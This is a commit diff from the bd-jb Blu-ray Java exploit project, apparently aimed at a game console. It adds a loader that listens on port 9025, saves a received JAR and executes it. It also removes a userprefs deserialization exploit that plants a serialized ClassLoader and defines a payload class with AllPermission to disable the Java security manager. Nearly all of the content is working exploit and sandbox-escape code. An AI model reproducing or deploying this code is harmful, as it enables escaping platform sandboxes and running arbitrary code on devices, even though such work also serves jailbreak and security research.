Add remote JAR loader and remove userprefs exploit.

Makefile

@@ -5,8 +5,12 @@ LIB = lib
 SRC = src
 TOOLS = tools
 
-CLASSES = \
-	$(SRC)/com/bdjb/ExploitXlet.java \
+LOADER_CLASSES = \
+	$(SRC)/com/bdjb/LoaderXlet.java \
+	$(SRC)/com/bdjb/Loader.java \
+	$(SRC)/com/bdjb/Screen.java \
+
+EXPLOIT_CLASSES = \
 	$(SRC)/com/bdjb/Exploit.java \
 	$(SRC)/com/bdjb/Screen.java \
 	$(SRC)/com/bdjb/api/API.java \
@@ -25,39 +29,42 @@ CLASSES = \
 	$(SRC)/com/bdjb/jit/JitCompilerReceiverImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ExploitDefaultImpl.java \
-	$(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
-	$(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
 	$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
 	$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
 
 JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
 
-all: directory serialized classes jar bdjo_bdmv
+all: loader exploit
 
-directory:
+loader: build_directory loader_classes loader_jar loader_bdjo_bdmv
+
+exploit: build_directory exploit_classes exploit_jar
+
+build_directory:
 	mkdir -p $(BUILD)
 
-serialized:
-	javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
-	java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
-	rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
+loader_classes:
+	javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(LOADER_CLASSES)
 
-classes:
-	javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
+exploit_classes:
+	javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(EXPLOIT_CLASSES)
 
-jar:
-	rm -rf $(BUILD)/jdk
+loader_jar:
 	mkdir -p  $(DISC)/BDMV/JAR
-	cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
+	cp $(SRC)/com/bdjb/bluray.LoaderXlet.perm $(BUILD)/com/bdjb/bluray.LoaderXlet.perm
 	cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
 	java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
 
-bdjo_bdmv:
+exploit_jar:
+	rm -rf $(BUILD)/jdk
+	cd $(BUILD) && jar cf 00000.jar . && cd ..
+
+loader_bdjo_bdmv:
 	mkdir -p  $(DISC)/BDMV/BDJO
 	java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
 	java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv

bdmv/bdjo.xml

@@ -15,7 +15,7 @@
         <classpathExtension></classpathExtension>
         <iconFlags>0x0</iconFlags>
         <iconLocator></iconLocator>
-        <initialClassName>com.bdjb.ExploitXlet</initialClassName>
+        <initialClassName>com.bdjb.LoaderXlet</initialClassName>
         <priority>128</priority>
         <profiles>
           <majorVersion>1</majorVersion>

src/com/bdjb/Exploit.java

@@ -9,26 +9,16 @@ package com.bdjb;
 
 import com.bdjb.exploit.kernel.ExploitKernelInterface;
 import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
-import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
 import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
 import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
-import java.io.FileOutputStream;
-import java.io.InputStream;
-import java.io.OutputStream;
-import java.net.InetAddress;
-import java.net.ServerSocket;
-import java.net.Socket;
-
-class Exploit implements Runnable {
-  static void init() {
-    Screen.println("[+] bd-jb by theflow");
+import java.lang.reflect.Method;
 
+public class Exploit {
+  public static void main(Method screenPrintln) {
+    Screen.setRemotePrintln(screenPrintln);
     Screen.println("[*] Escaping Java Sandbox...");
 
-    Class[] sandboxExploits =
-        new Class[] {
-          ExploitDefaultImpl.class, ExploitUserPrefsImpl.class, ExploitServiceProxyImpl.class
-        };
+    Class[] sandboxExploits = new Class[] {ExploitDefaultImpl.class, ExploitServiceProxyImpl.class};
 
     for (int i = 0; i < sandboxExploits.length; i++) {
       try {
@@ -46,29 +36,4 @@ class Exploit implements Runnable {
       Screen.println("[-] Error could not disable security manager.");
     }
   }
-
-  static void start() {
-    new Thread(new Exploit()).start();
-  }
-
-  public void run() {
-    if (System.getSecurityManager() != null) {
-      return;
-    }
-
-    Screen.println("[*] Exploiting kernel...");
-
-    Class[] kernelExploits = new Class[] {};
-
-    for (int i = 0; i < kernelExploits.length; i++) {
-      try {
-        ExploitKernelInterface exploit = (ExploitKernelInterface) kernelExploits[i].newInstance();
-        if (exploit.trigger()) {
-          break;
-        }
-      } catch (Exception e) {
-        continue;
-      }
-    }
-  }
 }

src/com/bdjb/Loader.java

@@ -0,0 +1,73 @@
+/*
+ * Copyright (C) 2021 Andy Nguyen
+ *
+ * This software may be modified and distributed under the terms
+ * of the MIT license.  See the LICENSE file for details.
+ */
+
+package com.bdjb;
+
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.net.URL;
+import java.lang.reflect.Method;
+import org.dvb.lang.DVBClassLoader;
+
+class Loader implements Runnable {
+  private static final String MNT_ADA_JAR_FILE = "/OS/HDD/download0/mnt_ada/00000.jar";
+
+  private static final String EXPLOIT_CLASS_NAME = "com.bdjb.Exploit";
+  private static final String MAIN_METHOD_NAME = "main";
+  private static final String PRINTLN_METHOD_NAME = "println";
+
+  static void startJarLoader() {
+    new Thread(new Loader()).start();
+  }
+
+  public void run() {
+    Screen.println("[+] bd-jb by theflow");
+
+    while (true) {
+      Screen.println("[*] Listening for remote JAR on port 9025...");
+
+      try {
+        ServerSocket serverSocket = new ServerSocket(9025);
+        Socket socket = serverSocket.accept();
+        InputStream inputStream = socket.getInputStream();
+        OutputStream outputStream = new FileOutputStream(MNT_ADA_JAR_FILE);
+
+        byte[] buf = new byte[8192];
+        int total = 0;
+        int read;
+        while ((read = inputStream.read(buf)) > 0) {
+          outputStream.write(buf, 0, read);
+          total += read;
+        }
+
+        outputStream.close();
+        inputStream.close();
+
+        serverSocket.close();
+
+        Screen.println("[+] Received " + total + " bytes");
+
+        Screen.println("[+] Launching JAR...");
+
+        DVBClassLoader dvbClassLoader =
+            DVBClassLoader.newInstance(new URL[] {new URL("file://" + MNT_ADA_JAR_FILE)});
+        Class exploitClass = dvbClassLoader.loadClass(EXPLOIT_CLASS_NAME);
+        Method main = exploitClass.getMethod(MAIN_METHOD_NAME, new Class[] {Method.class});
+        Method screenPrintln =
+            Screen.class.getMethod(PRINTLN_METHOD_NAME, new Class[] {String.class});
+        main.invoke(null, new Object[] {screenPrintln});
+
+        Screen.println("[+] JAR exited");
+      } catch (Exception e) {
+        Screen.println("[-] Error: " + e.getMessage());
+      }
+    }
+  }
+}

src/com/bdjb/LoaderXlet.java

@@ -13,13 +13,11 @@ import javax.tv.xlet.XletContext;
 import org.havi.ui.HScene;
 import org.havi.ui.HSceneFactory;
 
-public class ExploitXlet implements Xlet {
+public class LoaderXlet implements Xlet {
   private HScene scene;
   private Screen screen;
 
   public void initXlet(XletContext context) {
-    Exploit.init();
-
     screen = Screen.getInstance();
     screen.setSize(1920, 1080); // BD screen size
 
@@ -31,7 +29,7 @@ public class ExploitXlet implements Xlet {
   public void startXlet() {
     screen.setVisible(true);
     scene.setVisible(true);
-    Exploit.start();
+    Loader.startJarLoader();
   }
 
   public void pauseXlet() {

src/com/bdjb/Screen.java

@@ -11,6 +11,7 @@ import java.awt.Color;
 import java.awt.Container;
 import java.awt.Font;
 import java.awt.Graphics;
+import java.lang.reflect.Method;
 import java.util.ArrayList;
 
 public class Screen extends Container {
@@ -22,14 +23,28 @@ public class Screen extends Container {
 
   private static final Screen instance = new Screen();
 
+  private static Method remoteScreenPrintln = null;
+
   public static Screen getInstance() {
     return instance;
   }
 
+  public static void setRemotePrintln(Method screenPrintln) {
+    remoteScreenPrintln = screenPrintln;
+  }
+
   public static void println(String msg) {
+    if (remoteScreenPrintln != null) {
+      try {
+        remoteScreenPrintln.invoke(null, new Object[] {msg});
+      } catch (Exception e) {
+        // Ignore.
+      }
+    } else {
       messages.add(msg);
       instance.repaint();
     }
+  }
 
   public void paint(Graphics g) {
     g.setFont(FONT);

src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java

@@ -1,61 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license.  See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import java.io.FileOutputStream;
-import java.io.InputStream;
-import java.io.ObjectOutputStream;
-import java.io.OutputStream;
-import org.havi.ui.HSceneFactory;
-
-/** Implementation of the userprefs deserialization exploit. */
-public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
-  private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
-
-  private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
-      "/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
-
-  public boolean trigger() throws Exception {
-    try {
-      // Overwrite userprefs with a serialized PayloadClassLoader.
-      InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
-      OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
-
-      byte[] buf = new byte[8192];
-      int read;
-      while ((read = inputStream.read(buf)) > 0) {
-        outputStream.write(buf, 0, read);
-      }
-
-      outputStream.close();
-      inputStream.close();
-
-      // Trigger deserialization vulnerability.
-      try {
-        HSceneFactory.getInstance().getDefaultHScene();
-      } catch (ClassCastException e) {
-        // Exception expected.
-
-        // Instantiate the payload class.
-        PayloadClassLoader.getInstance().newPayload();
-
-        return System.getSecurityManager() == null;
-      }
-    } finally {
-      // Restore userprefs file.
-      String[][] preferences = new String[9][];
-      preferences[3] = new String[] {"26"};
-      ObjectOutputStream outputStream =
-          new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
-      outputStream.writeObject(preferences);
-      outputStream.close();
-    }
-
-    return false;
-  }
-}

src/com/bdjb/exploit/sandbox/PayloadClassLoader.java

@@ -1,57 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license.  See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import java.io.ByteArrayOutputStream;
-import java.io.InputStream;
-import java.io.ObjectInputStream;
-import java.io.Serializable;
-import java.security.AllPermission;
-import java.security.Permissions;
-import java.security.ProtectionDomain;
-
-/** ClassLoader subclass that is instantiated on deserialization. */
-class PayloadClassLoader extends ClassLoader implements Serializable {
-  private static final long serialVersionUID = 0x4141414141414141L;
-
-  private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
-  private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
-
-  private static PayloadClassLoader instance;
-
-  static PayloadClassLoader getInstance() {
-    return instance;
-  }
-
-  private void readObject(ObjectInputStream stream) {
-    instance = this;
-  }
-
-  void newPayload() throws Exception {
-    InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_FILE);
-    ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
-
-    byte[] buf = new byte[8192];
-    int read;
-    while ((read = inputStream.read(buf)) > 0) {
-      outputStream.write(buf, 0, read);
-    }
-
-    inputStream.close();
-
-    byte[] payload = outputStream.toByteArray();
-
-    // Instantiate the payload class with all permissions to disable the security manager.
-    Permissions permissions = new Permissions();
-    permissions.add(new AllPermission());
-    ProtectionDomain protectionDomain = new ProtectionDomain(null, permissions);
-    Class payloadClass =
-        defineClass(PAYLOAD_CLASS_NAME, payload, 0, payload.length, protectionDomain);
-    payloadClass.newInstance();
-  }
-}

src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java

@@ -1,25 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license.  See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import com.bdjb.exploit.sandbox.PayloadClassLoader;
-import java.io.FileOutputStream;
-import java.io.ObjectOutputStream;
-
-/** Simple util to create a serialized object of the PayloadClassLoader class. */
-class PayloadClassLoaderSerializer {
-  public static void main(String[] args) {
-    try {
-      ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
-      objectOutputStream.writeObject(new PayloadClassLoader());
-      objectOutputStream.close();
-    } catch (Exception e) {
-      e.printStackTrace();
-    }
-  }
-}